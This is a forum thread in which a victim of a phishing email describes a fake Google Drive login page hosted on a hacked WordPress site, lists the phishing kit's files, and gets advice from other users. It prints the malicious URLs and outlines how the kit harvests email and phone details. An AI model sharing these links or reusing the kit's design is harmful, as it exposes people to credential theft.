help me with this hacked website

[bwanaaa]

I get letters from a business partner and yesterday received a weird one with a link to a google docs page. The email looked official so i clicked the link. BAD. Here it is but BEWARE it is a honeypot

http://cellxpressions.com/wp-includes/css/Docs/document.php

The link itself was labeled 'shared docs' and was in the middle of a page with official looking info. Obviously my business partner's email has been hacked. And it has been used as a spam bot. and it tricked me into thinking it was a google shared docs file. After I figured out what happened, I went back to the site and browsed the folder

http://cellxpressions.com/wp-includes/css/Docs/

and there are a bunch of scripts there.I want to find out what those scripts do and track down the origin of this deviant. Obviously the website has no idea they have been hacked.

Besides reporting this site to Google and cellxpressions, what can i do? I want to find out what those scripts do and who they communicate back to. I guess I need to log into the server at cellxpressions?

 

[John Connor]

I use Bitdefender Free and when I click the link I get this.

I could allow it since I'm using a sandbox and a VPN, but I'm not going to.

Use Dropbox and upload the script files and I'll have a look.

A lot of hacks come from E-mail. Use common since next time. You said yourself it was weird. Why did you click it? If you use the Thunderbird E-mail client, install the Dr. Web Anti Virus Link Checker. Once installed you can right click links in the E-mail and it will tell you if it's infected or not. You can use Thunderbird with Gmail.


Edit- Went to the link and I need access to Google Drive.

It looks like a WordPress directory by the looks of the URL which is weird. Do you know InMotion Hosting, Inc.? The IP address is actually blacklisted as Hackers, Spyware, Botnets etc. That must have been why my Bitdefender got triggered.

 

[bwanaaa]

so in the directory,
http://cellxpressions.com/wp-includes/css/Docs/
are 3 html files and 3 php files.
view.html
pvalidate.html
processing.html
document.php
real2.php
really2.php
I can download these files and read them with a text editor.

The view.html document runs the document.php script. The document.php is a rather long file. It pulls a stylesheet from a folder on a google drive here,
http://googledrive.com/host/0By9Kk_KdPlufOVdIdzFSX25lYzg/
and it draws a fake google drive login page. It then validates the input to make sure you have typed in a valid email and telephone number. There is one reference to the really2.php script that seems to do more data validation.
I don't know where/how the processing.html or the validate.html documents are used. There is no reference to them.
The really interesting script is the real2.php script.
It is really a pdf document from Morgan Stanley that has been modified. I've read about pdf exploits and suspect this may be one but do not know how to analyze it. Any suggestions?

Still, I cannot see where the data they solicit is stored anywhere or sent anywhere else. So the whole structure may be a ruse to get the 'pdf' to run.

 

[John Connor]

Since all this crap is taking place on Google Drive I would get in contact with Google. I'm sure they appreciate a guy using their services for hacks.

 

[Elixer]

Well, virustotal shows this for that url
https://www.virustotal.com/en/url/a...bd6108bd25ca474755a771d6/analysis/1420846217/

As for getting to the bottom of this, you would have to get access to all those files, and decode them if they are encrypted, then, most likely it is using a proxy to transfer the info to.
It is rather difficult to backtrace all this stuff if you don't know what you are doing, so, in this case, I would report it to google, as was suggested, and they have a team that can look into this.